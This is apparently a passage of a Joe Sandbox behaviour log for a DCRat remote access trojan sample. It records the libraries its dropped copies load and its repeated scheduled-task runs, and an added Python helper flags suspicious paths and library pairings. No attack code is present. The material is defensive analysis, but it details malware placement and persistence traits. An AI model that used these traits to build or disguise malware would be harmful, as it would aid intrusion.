            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: dxgidebug.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: sfc_os.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: wintypes.dll (x3)
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: policymanager.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: msvcp110_win.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: pcacli.dll
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: mscoree.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: apphelp.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: kernel.appcore.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: version.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: ucrtbase_clr0400.dll (x2)
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: uxtheme.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: windows.storage.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: wldp.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: profapi.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: cryptsp.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: rsaenh.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: cryptbase.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: sspicli.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: ntmarta.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: wbemcomn.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: amsi.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: userenv.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: propsys.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: dlnashext.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: wpdshext.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: edputil.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: urlmon.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: iertutil.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: srvcli.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: netutils.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: wintypes.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: appresolver.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: bcp47langs.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: slc.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: sppc.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll (x12)
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll (x12)
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll (x12)
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll (x12)
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: ucrtbase_clr0400.dll (x2)
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: winmm.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: winmmbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: mmdevapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: devobj.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: ksuser.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: avrt.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: audioses.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Section loaded: powrprof.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: midimap.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: mscoree.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: apphelp.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: version.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: uxtheme.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: windows.storage.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: wldp.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: profapi.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: cryptsp.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: rsaenh.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: cryptbase.dll
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Section loaded: sspicli.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: mscoree.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: apphelp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: version.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: windows.storage.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: wldp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: profapi.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: mscoree.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: version.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: windows.storage.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: wldp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: profapi.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files\7-Zip\Lang\System.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: logoncli.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: ntdsapi.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
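The Section loaded entries above are the raw material for a first triage pass: which image paths are running, and which library combinations each one pulls in. The Python below is an added example for this page, not part of the Joe Sandbox report or of its signature set. It parses entries in the form the report prints (tolerating the "Jump to behavior" link text that extraction left attached), groups libraries by process image, and applies three heuristics of my own: a system-process name outside C:\Windows (the report's Sigma hit "Files With System Process Name In Unsuspected Locations"), execution from the Default profile template, and WinHTTP plus the WMI client library loaded by the same process. The sample input is a constructed subset of the entries listed above.

```python
"""Triage helper for the "Section loaded" entries of a sandbox report.

Added example for this page, not part of the Joe Sandbox report or of
its signature set: the parsing and the three flagging rules below are
my own heuristics. The sample text is a constructed subset of the
entries listed above, kept in the fused form the extraction produced.
"""
from __future__ import annotations

import ntpath
import re
from collections import defaultdict

# Constructed sample input: a handful of the report's own entries.
SAMPLE_LINES = r"""
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Users\Default\Videos\dfVXJbANbh.exeSection loaded: mscoree.dll
Source: C:\Program Files\7-Zip\Lang\System.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
"""

# Accepts both the fused "...exeSection loaded:" form and a "... | Section loaded:" form.
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Section loaded:\s*(?P<dll>[\w.\-]+\.dll)",
    re.IGNORECASE,
)

# Image names that only belong under C:\Windows. "System" itself has no
# image file at all, so a System.exe anywhere is suspect.
SYSTEM_PROCESS_NAMES = {
    "system.exe", "smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe",
    "services.exe", "lsass.exe", "svchost.exe", "explorer.exe", "dllhost.exe",
}


def parse_section_loads(text: str) -> dict[str, list[str]]:
    """Map each process image path to the ordered, de-duplicated list of
    libraries the report saw it load."""
    loads: dict[str, list[str]] = defaultdict(list)
    for raw in text.splitlines():
        match = LINE_RE.match(raw.strip())
        if not match:
            continue
        proc, dll = match.group("proc"), match.group("dll").lower()
        if dll not in loads[proc]:
            loads[proc].append(dll)
    return dict(loads)


def flag_processes(loads: dict[str, list[str]]) -> dict[str, list[str]]:
    """Apply the three heuristics; returns {process path: [reasons]} for hits."""
    findings: dict[str, list[str]] = {}
    for proc, dlls in loads.items():
        path = proc.lower()
        reasons = []
        # 1. System-process name living outside C:\Windows.
        if ntpath.basename(path) in SYSTEM_PROCESS_NAMES and not path.startswith("c:\\windows\\"):
            reasons.append("system process name outside C:\\Windows")
        # 2. Running from the Default profile template, which nobody logs into
        #    (my assumption of what a normal host looks like).
        if path.startswith("c:\\users\\default\\"):
            reasons.append("runs from C:\\Users\\Default")
        # 3. HTTP client plus WMI client in one process: the pairing a RAT
        #    needs for C2 traffic and host fingerprinting.
        if "winhttp.dll" in dlls and "wbemcomn.dll" in dlls:
            reasons.append("loads winhttp.dll and wbemcomn.dll together")
        if reasons:
            findings[proc] = reasons
    return findings


if __name__ == "__main__":
    for proc, why in flag_processes(parse_section_loads(SAMPLE_LINES)).items():
        print(proc, "->", "; ".join(why))
```

On the sample this flags System.exe under 7-Zip\Lang, the copy in C:\Users\Default\Videos, and the Primary Interop Assemblies copy (WinHTTP plus WMI), while schtasks.exe and w32tm.exe pass; swap in the full entry list from the report to triage every process it recorded.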
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Directory created: C:\Program Files\7-Zip\Lang\System.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Directory created: C:\Program Files\7-Zip\Lang\27d1bcfc3c54e0
            Source: DCRatBuild.exe | Static file information: File size 1165973 > 1048576
            Source: DCRatBuild.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DCRatBuild.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DCRatBuild.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DCRatBuild.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DCRatBuild.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DCRatBuild.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DCRatBuild.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
